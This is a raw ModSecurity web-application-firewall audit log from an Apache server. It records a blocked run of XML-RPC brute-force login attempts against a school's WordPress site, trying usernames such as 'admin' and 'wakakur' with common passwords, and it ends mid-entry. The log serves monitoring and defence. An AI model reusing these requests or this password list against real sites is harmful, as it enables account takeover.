Stopwatch2: 1744776055268505 4500; combined=3415, p1=391, p2=2780, p3=0, p4=0, p5=140, sr=118, sw=104, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--54128e26-Z--
--707c036e-A--
[16/Apr/2025:11:01:55 +0700] Z_8rsype92T0H9-Aa0y2kwAAAEw 103.236.140.4 51704 103.236.140.4 8181
--707c036e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--707c036e-C--
wp.getUsersBlogs
admin
Marketing2010
--707c036e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--707c036e-E--
--707c036e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776115311929 5587 (- - -)
Stopwatch2: 1744776115311929 5587; combined=3994, p1=505, p2=3244, p3=0, p4=0, p5=142, sr=104, sw=103, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--707c036e-Z--
--91d0f862-A--
[16/Apr/2025:11:02:55 +0700] Z_8r70-sESiKFppgz04XQAAAAM4 103.236.140.4 51990 103.236.140.4 8181
--91d0f862-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--91d0f862-C--
wp.getUsersBlogs
admin
Admin9876
--91d0f862-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--91d0f862-E--
--91d0f862-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776175378574 5924 (- - -)
Stopwatch2: 1744776175378574 5924; combined=4055, p1=529, p2=3343, p3=0, p4=0, p5=108, sr=96, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91d0f862-Z--
--69d43b4e-A--
[16/Apr/2025:11:03:55 +0700] Z_8sK0-sESiKFppgz04X1QAAANc 103.236.140.4 52288 103.236.140.4 8181
--69d43b4e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 215
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--69d43b4e-C--
wp.getUsersBlogs
admin
work
--69d43b4e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69d43b4e-E--
--69d43b4e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776235198949 5284 (- - -)
Stopwatch2: 1744776235198949 5284; combined=3737, p1=514, p2=3056, p3=0, p4=0, p5=99, sr=134, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69d43b4e-Z--
--99144223-A--
[16/Apr/2025:11:04:55 +0700] Z_8sZxk9XPLR9cFiTEu7vgAAAAc 103.236.140.4 52596 103.236.140.4 8181
--99144223-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--99144223-C--
wp.getUsersBlogs
admin
sunshine
--99144223-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--99144223-E--
--99144223-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776295036209 4707 (- - -)
Stopwatch2: 1744776295036209 4707; combined=3517, p1=380, p2=2925, p3=0, p4=0, p5=119, sr=82, sw=93, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--99144223-Z--
--163f7663-A--
[16/Apr/2025:11:04:57 +0700] Z_8saSpe92T0H9-Aa0y26QAAAEM 103.236.140.4 52606 103.236.140.4 8181
--163f7663-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--163f7663-C--
wp.getUsersBlogs
admin
1234%^&*
--163f7663-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--163f7663-E--
--163f7663-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776297172096 4443 (- - -)
Stopwatch2: 1744776297172096 4443; combined=3325, p1=372, p2=2763, p3=0, p4=0, p5=117, sr=101, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--163f7663-Z--
--18742434-A--
[16/Apr/2025:11:05:55 +0700] Z_8soype92T0H9-Aa0y3IwAAAE4 103.236.140.4 52894 103.236.140.4 8181
--18742434-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--18742434-C--
wp.getUsersBlogs
admin
diamond
--18742434-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--18742434-E--
--18742434-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776355012939 4234 (- - -)
Stopwatch2: 1744776355012939 4234; combined=3292, p1=375, p2=2740, p3=0, p4=0, p5=102, sr=81, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--18742434-Z--
--503c2123-A--
[16/Apr/2025:11:06:55 +0700] Z_8s3xk9XPLR9cFiTEu8oAAAABQ 103.236.140.4 53212 103.236.140.4 8181
--503c2123-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--503c2123-C--
wp.getUsersBlogs
admin
liverpool1
--503c2123-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--503c2123-E--
--503c2123-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776415191642 5420 (- - -)
Stopwatch2: 1744776415191642 5420; combined=3781, p1=482, p2=3128, p3=0, p4=0, p5=101, sr=102, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--503c2123-Z--
--5f55e003-A--
[16/Apr/2025:11:07:55 +0700] Z_8tGype92T0H9-Aa0y3dQAAAEA 103.236.140.4 53490 103.236.140.4 8181
--5f55e003-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5f55e003-C--
wp.getUsersBlogs
wakakur
wakakur2018
--5f55e003-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f55e003-E--
--5f55e003-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776475712974 6168 (- - -)
Stopwatch2: 1744776475712974 6168; combined=4301, p1=564, p2=3561, p3=0, p4=0, p5=105, sr=100, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f55e003-Z--
--50b23a59-A--
[16/Apr/2025:11:08:55 +0700] Z_8tVype92T0H9-Aa0y36wAAAEE 103.236.140.4 53800 103.236.140.4 8181
--50b23a59-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--50b23a59-C--
wp.getUsersBlogs
wakakur
marketing2010_
--50b23a59-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--50b23a59-E--
--50b23a59-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776535306107 4615 (- - -)
Stopwatch2: 1744776535306107 4615; combined=3420, p1=388, p2=2839, p3=0, p4=0, p5=110, sr=81, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--50b23a59-Z--
--7e5f8378-A--
[16/Apr/2025:11:09:55 +0700] Z_8tk0-sESiKFppgz04Y0QAAANM 103.236.140.4 54122 103.236.140.4 8181
--7e5f8378-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7e5f8378-C--
wp.getUsersBlogs
wakakur
123465
--7e5f8378-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7e5f8378-E--
--7e5f8378-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776595085000 4578 (- - -)
Stopwatch2: 1744776595085000 4578; combined=3468, p1=384, p2=2863, p3=0, p4=0, p5=123, sr=80, sw=98, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7e5f8378-Z--
--b683b24b-A--
[16/Apr/2025:11:10:55 +0700] Z_8tzype92T0H9-Aa0y4VgAAAFI 103.236.140.4 54432 103.236.140.4 8181
--b683b24b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b683b24b-C--
wp.getUsersBlogs
wakakur
admin123456789
--b683b24b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b683b24b-E--
--b683b24b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776655310369 4321 (- - -)
Stopwatch2: 1744776655310369 4321; combined=3256, p1=360, p2=2731, p3=0, p4=0, p5=96, sr=82, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b683b24b-Z--
--630ded25-A--
[16/Apr/2025:11:11:38 +0700] Z_8t-k-sESiKFppgz04ZGAAAAM8 103.236.140.4 54656 103.236.140.4 8181
--630ded25-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--630ded25-C--
wp.getUsersBlogs
wakakur
1234%^&*
--630ded25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--630ded25-E--
--630ded25-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776698324531 3355 (- - -)
Stopwatch2: 1744776698324531 3355; combined=2502, p1=265, p2=2099, p3=0, p4=0, p5=83, sr=62, sw=55, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--630ded25-Z--
--0260926a-A--
[16/Apr/2025:11:11:55 +0700] Z_8uCxk9XPLR9cFiTEu9VAAAAAc 103.236.140.4 54746 103.236.140.4 8181
--0260926a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0260926a-C--
wp.getUsersBlogs
wakakur
baseball
--0260926a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0260926a-E--
--0260926a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776715060113 4413 (- - -)
Stopwatch2: 1744776715060113 4413; combined=3399, p1=371, p2=2834, p3=0, p4=0, p5=110, sr=82, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0260926a-Z--
--d0112c0a-A--
[16/Apr/2025:11:12:55 +0700] Z_8uR5VnVduWmh0dMDMTVQAAAIs 103.236.140.4 55064 103.236.140.4 8181
--d0112c0a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d0112c0a-C--
wp.getUsersBlogs
wakakur
senha
--d0112c0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0112c0a-E--
--d0112c0a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776775221480 4293 (- - -)
Stopwatch2: 1744776775221480 4293; combined=3190, p1=350, p2=2661, p3=0, p4=0, p5=103, sr=79, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0112c0a-Z--
--a11b1c01-A--
[16/Apr/2025:11:13:55 +0700] Z_8ug5VnVduWmh0dMDMToQAAAJA 103.236.140.4 55378 103.236.140.4 8181
--a11b1c01-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a11b1c01-C--
wp.getUsersBlogs
wakakur
tottenham1
--a11b1c01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a11b1c01-E--
--a11b1c01-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776835169183 4346 (- - -)
Stopwatch2: 1744776835169183 4346; combined=3387, p1=383, p2=2818, p3=0, p4=0, p5=107, sr=81, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a11b1c01-Z--
--2c74e644-A--
[16/Apr/2025:11:14:55 +0700] Z_8uv0-sESiKFppgz04ZVAAAAMM 103.236.140.4 55690 103.236.140.4 8181
--2c74e644-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
